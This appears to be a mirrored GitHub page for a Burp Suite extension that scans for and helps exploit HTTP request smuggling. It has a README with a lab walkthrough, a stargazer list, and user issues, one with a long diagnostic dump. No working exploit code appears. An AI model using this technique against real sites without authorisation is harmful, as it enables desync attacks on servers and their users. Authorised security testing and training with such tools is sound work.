portswigger / http-request-smuggler Goto Github PK

Home Page: https://portswigger.net/blog/http-desync-attacks

License: Other

Python 2.37% Java 96.96% HTML 0.47% Shell 0.20%

http-request-smuggler's Introduction

HTTP Request Smuggler

This is an extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks, originally created during HTTP Desync Attacks research. It supports scanning for Request Smuggling vulnerabilities, and also aids exploitation by handling cumbersome offset-tweaking for you.

This extension should not be confused with Burp Suite HTTP Smuggler, which uses similar techniques but is focused exclusively bypassing WAFs.

Install

The easiest way to install this is in Burp Suite, via Extender -> BApp Store.

If you prefer to load the jar manually, in Burp Suite (community or pro), use Extender -> Extensions -> Add to load build/libs/http-request-smuggler-all.jar

Compile

Turbo Intruder is a dependency of this project, add it to the root of this source tree as turbo-intruder-all.jar

Build using:

Linux: ./gradlew build fatjar

Windows: gradlew.bat build fatjar

Grab the output from build/libs/desynchronize-all.jar

Use

Right click on a request and click Launch Smuggle probe, then watch the extension's output pane under Extender->Extensions->HTTP Request Smuggler

If you're using Burp Pro, any findings will also be reported as scan issues.

If you right click on a request that uses chunked encoding, you'll see another option marked Launch Smuggle attack. This will open a Turbo Intruder window in which you can try out various attacks by editing the prefix variable.

For more advanced use watch the video.

Practice

We've released a collection of free online labs to practise against. Here's how to use the tool to solve the first lab - HTTP request smuggling, basic CL.TE vulnerability:

Use the Extender->BApp store tab to install the 'HTTP Request Smuggler' extension.
Load the lab homepage, find the request in the proxy history, right click and select 'Launch smuggle probe', then click 'OK'.
Wait for the probe to complete, indicated by 'Completed 1 of 1' appearing in the extension's output tab.
If you're using Burp Suite Pro, find the reported vulnerability in the dashboard and open the first attached request.
If you're using Burp Suite Community, copy the request from the output tab and paste it into the repeater, then complete the 'Target' details on the top right.
Right click on the request and select 'Smuggle attack (CL.TE)'.
Change the value of the 'prefix' variable to 'G', then click 'Attack' and confirm that one response says 'Unrecognised method GPOST'.

By changing the 'prefix' variable in step 7, you can solve all the labs and virtually every real-world scenario.

http-request-smuggler's People

Contributors

Stargazers

Watchers

Forkers

tillson superf0sh vineshchauhan24 wxy7174 lol768 amanvir abdelalikhalfi plenumlab heruix imulmul rootedaccess modulexcite lwzsoviet hwany417 test123test111 djiangliu jverse slowmistio liang2580 c002 hello-xbugs mmillerxyz isecren nmhai kilomaster sodarda uid-root crackercat websecresearch jamesly123 burpsuiteextensions markwh245 0xfatty mbijon hktalent red-infosec jarlob sridharm17 fawadkhanfk ankurvaishley massito joaopedrotaveira jackpot777 1337g magicnieh denisoancea idkwim ith4cker swipswaps ncupeterpan elamaran619 tkryscio inwima tazafal yalonso7 sandythesamurai green-m amesianx jgallimore kubosec sakalletla marciopocebon jeromeyoung geekforfree securityanalysts orgchao stjordanis ghost5683 lining79355504 thoundsn darkoneiroi lovechen excloudx6 tommalvoriddle joseluisinigo alexsandershaw ruevaughn hartl3y94 croat79 cleanmgr112 rungix 0xsojalsec cwavesoftware dajneem23 thomas-ayissi data-gami hannah-portswigger z-bool erenctnky dieberge cocoh-23 ugbahaski p7ket peddipedderu phyo6hu tiefps rao2357 a1k-ghaz1 liu-pro mdiqbalahmad

http-request-smuggler's Issues

[new request]add a drop down button and reduce height

I found that the attack config interface is beyond my screen. I can't see what the corresponding button is when I use enter?

How to stop scanning?

Once the smuggler started, is there anyway to stop it?

"Convert to chunked" broken ?

Hello,

I'm trying to manually "Convert to chunked" in Burp Repeater, and it does not do anything: the request is not modified. Is there an issue with the plugin ?

The Burp version in use is the latest in the early adopter branch (if I'm not mistaken): v2021.8.3-9673
HTTP Request Smuggler v2.01. I just reinstalled it, unloaded all the other extensions and restarted Burp, same thing.

Thanks in advance.

Cheers,

Not working against burpsuite lab

I have been testing the extension against https://portswigger.net/web-security/request-smuggling/finding/lab-confirming-te-cl-via-differential-responses

I launch the extension from right clicking on a request, and then select "Smuggle Probe". Wait a while, and the results are always the same:

Queued 1 attacks from 1 requests in 0 seconds
Completed 4 of 4 with 820 requests, 0 candidates and 0 findings

No findings at all.

Ideas?

Launch Smuggler Probe Fails To Detect Vulnerability on Basic Web Academy Lab

I'm running a clean install of Burp Suite Pro Version on Kali Linux and attempting to test the HTTP Request Smuggler Probe on the PortSwigger Web Academy Request Smuggler Lab 1.

After launching the probe the output pane in the extender tab shows the requests constantly timing out and saying 'Unexpected Report With Response".

Notably, running the extension on the community edition of Burp on both Kali Linux and MacOS detects the vulnerability in the lab. Its possible I have something strange going on with my install but I would love if someone could verify this issue or lack of it on their end with the same set up

Update: the extension will work when only itself and Turbo Intruder are loaded. Once Param Miner is loaded the extension seems to fail although the culprit for the failure could be linked to any of the following loaded extensions at time of testing:
Active Scan++
Backslash Powered Scanner
Upload Scanner

I have some problems. Can you give me some advice?

I read your article and I know how to test request smuggling. But according to your method, send an attacker's request and then send a large number of victim's requests. But when I send a large number of victim's requests, there are some problems. When I use request smuggler(TE.CL) and turbo intruder, it simply sends a large number of attacker's requests. I sent an attacker request like this

When I put this request in the repeater module, it returned 200 ok. But when I attacked

I can't get the 404 result I want. Because all requests are repeated attacker requests, None of them are normal requests. I was really confused. What should I do? How should I use this extension??

Unable to install extension via BApp Store

I am trying to install the extension in Burp Suite running on Windows 10 32 bit, but the status remains as "Installing" but never gets installed. I tried it multiple times, both on Burp Suite Professional and Community version, but no luck.

Utils in BurpExtender.java

What is the Utils in BurpExtender.java ?

Smuggle attack script don't fix the content-length header.

When I'm doing a hopefully404 confirm test, the request content-Length will always be the same value as the original request, in my test case it's "Content-Length: 11", but in your demo video I notice that there is a "Content-Length: 44", which has been fixed.

The comment says that "The request engine will auto-fix the content-length for us", maybe something wrong with my settings?

I've already check the update Content-Length feature in both Repeater and Proxy-Options-Intercept Client Requests.

Smuggle probe does not run any tests

Running the Smuggle Probe on lab 1 HTTP request smuggling, basic CL.TE vulnerability does not start any tests. In the plugin logs, I only see:

Using albinowaxUtils v1.02
This extension should be run on the latest version of Burp Suite. Using an older version of Burp may cause impaired functionality.
Loaded HTTP Request Smuggler v2.02
Updating active thread pool size to 8
Loop 0
Queued 0 attacks from 1 requests in 0 seconds

Diagnostic info:

apple.eawt.quitStrategy          CLOSE_ALL_WINDOWS
apple.laf.useScreenMenuBar       true
com.apple.mrj.application.apple.menu.about.name Burp Suite Professional
com.sun.net.ssl.requireCloseNotify false
exe4j.moduleName                 /Applications/Burp Suite Professional.app
file.encoding                    UTF-8
file.separator                   /
flatlaf.uiScale.enabled          false
ftp.nonProxyHosts                local|*.local|169.254/16|*.169.254/16
http.nonProxyHosts               local|*.local|169.254/16|*.169.254/16
i4j.jreBundle                    /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle
i4j.ownBundlePath                /Applications/Burp Suite Professional.app
install4j.appDir                 /Applications/Burp Suite Professional.app/Contents/Resources/app/
install4j.exeDir                 /Applications/
install4j.launcherId             70
install4j.swt                    false
java.class.path                  /Applications/Burp Suite Professional.app/Contents/Resources/app/.install4j/i4jruntime.jar:/Applications/Burp Suite Professional.app/Contents/Resources/app/burpsuite_pro.jar
java.class.version               61.0
java.home                        /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home
java.io.tmpdir                   /var/folders/kb/4fhcj40x14lcnqw1tw5j1mr00000gn/T/
java.library.path                /Users/michalwalkowski/Library/Java/Extensions:/Library/Java/Extensions:/Network/Library/Java/Extensions:/System/Library/Java/Extensions:/usr/lib/java:.
java.runtime.name                OpenJDK Runtime Environment
java.runtime.version             17.0.2+8-86
java.specification.name          Java Platform API Specification
java.specification.vendor        Oracle Corporation
java.specification.version       17
java.vendor                      Oracle Corporation
java.vendor.url                  https://java.oracle.com/
java.vendor.url.bug              https://bugreport.java.com/bugreport/
java.version                     17.0.2
java.version.date                2022-01-18
java.vm.compressedOopsMode       Zero based
java.vm.info                     mixed mode
java.vm.name                     OpenJDK 64-Bit Server VM
java.vm.specification.name       Java Virtual Machine Specification
java.vm.specification.vendor     Oracle Corporation
java.vm.specification.version    17
java.vm.vendor                   Oracle Corporation
java.vm.version                  17.0.2+8-86
jdk.debug                        release
jdk.tls.allowUnsafeServerCertChange true
jdk.tls.maxCertificateChainLength 30
native.encoding                  UTF-8
org.bouncycastle.jsse.client.dh.minimumPrimeBits 1024
org.bouncycastle.jsse.client.dh.unrestrictedGroups true
os.arch                          x86_64
os.name                          Mac OS X
os.version                       12.4
path.separator                   :
socksNonProxyHosts               local|*.local|169.254/16|*.169.254/16
sun.arch.data.model              64
sun.awt.enableExtraMouseButtons  true
sun.boot.library.path            /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib
sun.cpu.endian                   little
sun.font.fontmanager             sun.font.CFontManager
sun.io.unicode.encoding          UnicodeBig
sun.java.command                 com.install4j.runtime.launcher.MacLauncher
sun.java.launcher                SUN_STANDARD
sun.jnu.encoding                 UTF-8
sun.management.compiler          HotSpot 64-Bit Tiered Compilers
user.country                     PL
user.dir                         /Applications/Burp Suite Professional.app/Contents/Resources/app
user.home                        /Users/michalwalkowski
user.language                    pl
user.name                        michalwalkowski
user.timezone                    Europe/Warsaw

Burp Version                     2022.3.8
Build Number                     13217
Update Channel                   Stable
Burp Browser Version             101.0.4951.64
Burp Browser binaries            /Applications/Burp Suite Professional.app/Contents/Resources/app/burpbrowser/101.0.4951.64
Code source                      /Applications/Burp Suite Professional.app/Contents/Resources/app/burpsuite_pro.jar
Debug ID                         yeflpp91o1g0kf1wzciw:d0f7
JAR type                         Installer
currenttimemillis                1653244998714
nanotime                         3514044998113

PATH                             /usr/bin:/bin:/usr/sbin:/sbin
__CFBundleIdentifier             com.install4j.7318-9294-3757-1226.70
SHELL                            /bin/zsh
JAVA_MAIN_CLASS_46802            com.install4j.runtime.launcher.MacLauncher
USER                             michalwalkowski
LANG                             pl_PL.UTF-8
TMPDIR                           /var/folders/kb/4fhcj40x14lcnqw1tw5j1mr00000gn/T/
COMMAND_MODE                     unix2003
SSH_AUTH_SOCK                    /private/tmp/com.apple.launchd.kv8qhTjXuQ/Listeners
XPC_FLAGS                        0x0
__CF_USER_TEXT_ENCODING          0x1F5:0x1D:0x2A
LOGNAME                          michalwalkowski
XPC_SERVICE_NAME                 application.com.install4j.7318-9294-3757-1226.70.176255290.176255297
HOME                             /Users/michalwalkowski

HTTP Request Smuggler            Extension type: Java, Method: registerExtenderCallbacks, Extension state listeners: 2, Context menu providers: 3

Total memory                     377,487,360
Max memory                       17,179,869,184
Free memory                      246,481,320
Number of processors             12

---------------------------------------------------------------------------------------------------------
RUNNING TASKS
---------------------------------------------------------------------------------------------------------
Task                             1
Type                             Live passive crawl
Resource pool                    Default resource pool
Paused                           false
Number of requests               0
Number of failed requests        0
Number of in-progress requests   0
Number of queued requests        0
Active work lock                 java.util.concurrent.locks.ReentrantLock@3ce8c0eb[Unlocked]
Active work queue                0
Priority passive work queue      0
Active workers                   0
Closed                           false
Priority passive queue decrease  false
Pending request engine decrease  false
Throttling lock                  java.util.concurrent.locks.ReentrantLock@5b36e66e[Unlocked]
Closed                           false
Paused                           false
Paused queued requests           <null>
Paused non-queued requests       <null>
---------------------------------------------------------------------------------------------------------
Task                             2
Type                             Live audit
Resource pool                    Default resource pool
Paused                           false
Number of requests               0
Number of failed requests        0
Number of in-progress requests   0
Number of queued requests        0
Active work lock                 java.util.concurrent.locks.ReentrantLock@45717e89[Unlocked]
Active work queue                0
Priority passive work queue      0
Active workers                   0
Closed                           false
Priority passive queue decrease  false
Pending request engine decrease  false
Throttling lock                  java.util.concurrent.locks.ReentrantLock@5b36e66e[Unlocked]
Closed                           false
Paused                           false
Paused queued requests           <null>
Paused non-queued requests       <null>
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
RESOURCE POOLS
---------------------------------------------------------------------------------------------------------
Name                             Default resource pool
Concurrent request limit         10
Lock state                       java.util.concurrent.locks.ReentrantLock@5b36e66e[Unlocked]
Last pause request time          0
Last resume request time         0
Number of in progress requests   0
Paused                           false
Queue size                       0
Queued requests                  []
Last pause time nanos            0
Last resume time nanos           0
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
BROWSER POOL
---------------------------------------------------------------------------------------------------------
Available                        0
Terminated                       0
Can create new browser           true
Number of blocked clients        0
Total active browsers            0
Total number of browsers created 0
---------------------------------------------------------------------------------------------------------
CURRENT THREADS
---------------------------------------------------------------------------------------------------------
Reference Handler
    native=false, suspended=false, block=11, wait=0
    lock=null owned by null (-1), cpu=2, user=2
        [email protected]/java.lang.ref.Reference.waitForReferencePendingList(Native Method)
        [email protected]/java.lang.ref.Reference.processPendingReferences(Reference.java:253)
        [email protected]/java.lang.ref.Reference$ReferenceHandler.run(Reference.java:215)

Finalizer
    native=false, suspended=false, block=10, wait=12
    lock=java.lang.ref.ReferenceQueue$Lock@5d1a897c owned by null (-1), cpu=2, user=1
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.ref.ReferenceQueue.remove(ReferenceQueue.java:155)
        [email protected]/java.lang.ref.ReferenceQueue.remove(ReferenceQueue.java:176)
        [email protected]/java.lang.ref.Finalizer$FinalizerThread.run(Finalizer.java:172)

Signal Dispatcher
    native=false, suspended=false, block=0, wait=0
    lock=null owned by null (-1), cpu=0, user=0

Common-Cleaner
    native=false, suspended=false, block=22, wait=24
    lock=java.lang.ref.ReferenceQueue$Lock@13513160 owned by null (-1), cpu=4, user=3
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.ref.ReferenceQueue.remove(ReferenceQueue.java:155)
        [email protected]/jdk.internal.ref.CleanerImpl.run(CleanerImpl.java:140)
        [email protected]/java.lang.Thread.run(Thread.java:833)
        [email protected]/jdk.internal.misc.InnocuousThread.run(InnocuousThread.java:162)

Notification Thread
    native=false, suspended=false, block=0, wait=0
    lock=null owned by null (-1), cpu=12, user=11

AppKit Thread
    native=false, suspended=false, block=127, wait=139
    lock=null owned by null (-1), cpu=5454, user=4174
        [email protected]/sun.lwawt.macosx.CPlatformWindow.nativeGetTopmostPlatformWindowUnderMouse(Native Method)
        [email protected]/sun.lwawt.macosx.LWCToolkit.getPlatformWindowUnderMouse(LWCToolkit.java:1029)
        [email protected]/sun.lwawt.LWWindowPeer.notifyMouseEvent(LWWindowPeer.java:843)
        [email protected]/sun.lwawt.macosx.CPlatformResponder.handleMouseEvent(CPlatformResponder.java:84)
        [email protected]/sun.lwawt.macosx.CPlatformView.deliverMouseEvent(CPlatformView.java:191)

Timer-0
    native=false, suspended=false, block=0, wait=2
    lock=java.util.TaskQueue@432b7412 owned by null (-1), cpu=0, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        [email protected]/java.util.TimerThread.mainLoop(Timer.java:537)
        [email protected]/java.util.TimerThread.run(Timer.java:516)

Java2D Queue Flusher
    native=false, suspended=false, block=968, wait=2808
    lock=sun.java2d.opengl.OGLRenderQueue$QueueFlusher@5aa8ef1 owned by null (-1), cpu=349, user=189
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/sun.java2d.opengl.OGLRenderQueue$QueueFlusher.run(OGLRenderQueue.java:206)
        [email protected]/java.lang.Thread.run(Thread.java:833)

Java2D Disposer
    native=false, suspended=false, block=30, wait=31
    lock=java.lang.ref.ReferenceQueue$Lock@c72b651 owned by null (-1), cpu=1, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.ref.ReferenceQueue.remove(ReferenceQueue.java:155)
        [email protected]/java.lang.ref.ReferenceQueue.remove(ReferenceQueue.java:176)
        [email protected]/sun.java2d.Disposer.run(Disposer.java:145)
        [email protected]/java.lang.Thread.run(Thread.java:833)

TimerQueue
    native=false, suspended=false, block=0, wait=1095
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@16b24c8e owned by null (-1), cpu=58, user=42
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:252)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.awaitNanos(AbstractQueuedSynchronizer.java:1672)
        [email protected]/java.util.concurrent.DelayQueue.take(DelayQueue.java:229)
        [email protected]/javax.swing.TimerQueue.run(TimerQueue.java:172)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-5-thread-1
    native=false, suspended=false, block=0, wait=2
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@ea131ae owned by null (-1), cpu=0, user=0
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:252)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.awaitNanos(AbstractQueuedSynchronizer.java:1672)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:1182)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:899)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-4-thread-1
    native=false, suspended=false, block=0, wait=2
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@5f2deb8d owned by null (-1), cpu=0, user=0
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.park(LockSupport.java:341)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionNode.block(AbstractQueuedSynchronizer.java:506)
        [email protected]/java.util.concurrent.ForkJoinPool.unmanagedBlock(ForkJoinPool.java:3463)
        [email protected]/java.util.concurrent.ForkJoinPool.managedBlock(ForkJoinPool.java:3434)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.await(AbstractQueuedSynchronizer.java:1623)
        [email protected]/java.util.concurrent.LinkedBlockingQueue.take(LinkedBlockingQueue.java:435)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-platform-thread-1
    native=true, suspended=false, block=0, wait=0
    lock=null owned by null (-1), cpu=0, user=0
        [email protected]/sun.nio.ch.Net.accept(Native Method)
        [email protected]/sun.nio.ch.NioSocketImpl.accept(NioSocketImpl.java:755)
        [email protected]/java.net.ServerSocket.implAccept(ServerSocket.java:675)
        [email protected]/java.net.ServerSocket.platformImplAccept(ServerSocket.java:641)
        [email protected]/java.net.ServerSocket.implAccept(ServerSocket.java:617)
        [email protected]/java.net.ServerSocket.implAccept(ServerSocket.java:574)
        [email protected]/java.net.ServerSocket.accept(ServerSocket.java:532)
        app//burp.b_n.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

AWT-Shutdown
    native=false, suspended=false, block=143, wait=144
    lock=java.lang.Object@46f41e07 owned by null (-1), cpu=1, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        [email protected]/sun.awt.AWTAutoShutdown.run(AWTAutoShutdown.java:291)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-platform-thread-2
    native=false, suspended=false, block=11, wait=1
    lock=java.util.concurrent.SynchronousQueue$TransferStack@4226fc6b owned by null (-1), cpu=193, user=180
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.park(LockSupport.java:341)
        [email protected]/java.util.concurrent.SynchronousQueue$TransferStack$SNode.block(SynchronousQueue.java:288)
        [email protected]/java.util.concurrent.ForkJoinPool.unmanagedBlock(ForkJoinPool.java:3463)
        [email protected]/java.util.concurrent.ForkJoinPool.managedBlock(ForkJoinPool.java:3434)
        [email protected]/java.util.concurrent.SynchronousQueue$TransferStack.transfer(SynchronousQueue.java:397)
        [email protected]/java.util.concurrent.SynchronousQueue.take(SynchronousQueue.java:886)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

AWT-EventQueue-0
    native=false, suspended=false, block=956, wait=7491
    lock=null owned by null (-1), cpu=3961, user=3716
        [email protected]/sun.management.ThreadImpl.getThreadInfo1(Native Method)
        [email protected]/sun.management.ThreadImpl.getThreadInfo(ThreadImpl.java:195)
        app//burp.ium.a(Unknown Source)
        app//burp.ek2.a(Unknown Source)
        app//burp.ek2.a(Unknown Source)
        app//burp.ek2.a(Unknown Source)
        app//burp.ad_.actionPerformed(Unknown Source)
        [email protected]/javax.swing.AbstractButton.fireActionPerformed(AbstractButton.java:1972)
        [email protected]/javax.swing.AbstractButton$Handler.actionPerformed(AbstractButton.java:2313)
        [email protected]/javax.swing.DefaultButtonModel.fireActionPerformed(DefaultButtonModel.java:405)
        [email protected]/javax.swing.DefaultButtonModel.setPressed(DefaultButtonModel.java:262)
        [email protected]/javax.swing.AbstractButton.doClick(AbstractButton.java:374)
        [email protected]/com.apple.laf.ScreenMenuItem.actionPerformed(ScreenMenuItem.java:129)
        [email protected]/java.awt.MenuItem.processActionEvent(MenuItem.java:692)
        [email protected]/java.awt.MenuItem.processEvent(MenuItem.java:651)
        [email protected]/java.awt.MenuComponent.dispatchEventImpl(MenuComponent.java:379)
        [email protected]/java.awt.MenuComponent.dispatchEvent(MenuComponent.java:367)
        [email protected]/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:776)
        [email protected]/java.awt.EventQueue$4.run(EventQueue.java:722)
        [email protected]/java.awt.EventQueue$4.run(EventQueue.java:716)
        [email protected]/java.security.AccessController.executePrivileged(AccessController.java:776)
        [email protected]/java.security.AccessController.doPrivileged(AccessController.java:399)
        [email protected]/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:86)
        [email protected]/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:97)
        [email protected]/java.awt.EventQueue$5.run(EventQueue.java:746)
        [email protected]/java.awt.EventQueue$5.run(EventQueue.java:744)
        [email protected]/java.security.AccessController.executePrivileged(AccessController.java:776)
        [email protected]/java.security.AccessController.doPrivileged(AccessController.java:399)
        [email protected]/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:86)
        [email protected]/java.awt.EventQueue.dispatchEvent(EventQueue.java:743)
        [email protected]/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
        [email protected]/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
        [email protected]/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
        [email protected]/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
        [email protected]/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
        [email protected]/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)

DestroyJavaVM
    native=false, suspended=false, block=0, wait=0
    lock=null owned by null (-1), cpu=3619, user=3420

pool-platform-thread-3
    native=false, suspended=false, block=0, wait=1
    lock=java.util.concurrent.SynchronousQueue$TransferStack@4226fc6b owned by null (-1), cpu=0, user=0
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.park(LockSupport.java:341)
        [email protected]/java.util.concurrent.SynchronousQueue$TransferStack$SNode.block(SynchronousQueue.java:288)
        [email protected]/java.util.concurrent.ForkJoinPool.unmanagedBlock(ForkJoinPool.java:3463)
        [email protected]/java.util.concurrent.ForkJoinPool.managedBlock(ForkJoinPool.java:3434)
        [email protected]/java.util.concurrent.SynchronousQueue$TransferStack.transfer(SynchronousQueue.java:397)
        [email protected]/java.util.concurrent.SynchronousQueue.take(SynchronousQueue.java:886)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

SwingWorker-pool-10-thread-1
    native=false, suspended=false, block=134, wait=139
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@450d99c0 owned by null (-1), cpu=941, user=893
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.park(LockSupport.java:341)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionNode.block(AbstractQueuedSynchronizer.java:506)
        [email protected]/java.util.concurrent.ForkJoinPool.unmanagedBlock(ForkJoinPool.java:3463)
        [email protected]/java.util.concurrent.ForkJoinPool.managedBlock(ForkJoinPool.java:3434)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.await(AbstractQueuedSynchronizer.java:1623)
        [email protected]/java.util.concurrent.LinkedBlockingQueue.take(LinkedBlockingQueue.java:435)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-13-thread-1
    native=false, suspended=false, block=0, wait=20
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@754c636f owned by null (-1), cpu=1, user=1
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:252)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.awaitNanos(AbstractQueuedSynchronizer.java:1672)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:1182)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:899)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-scheduled-project-thread-1
    native=false, suspended=false, block=1, wait=650
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@13ae4fe7 owned by null (-1), cpu=256, user=219
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:252)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.awaitNanos(AbstractQueuedSynchronizer.java:1672)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:1182)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:899)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-14-thread-1
    native=false, suspended=false, block=0, wait=2
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@661e3c5d owned by null (-1), cpu=28, user=26
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:252)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.awaitNanos(AbstractQueuedSynchronizer.java:1672)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:1182)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:899)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-1
    native=false, suspended=false, block=136, wait=130
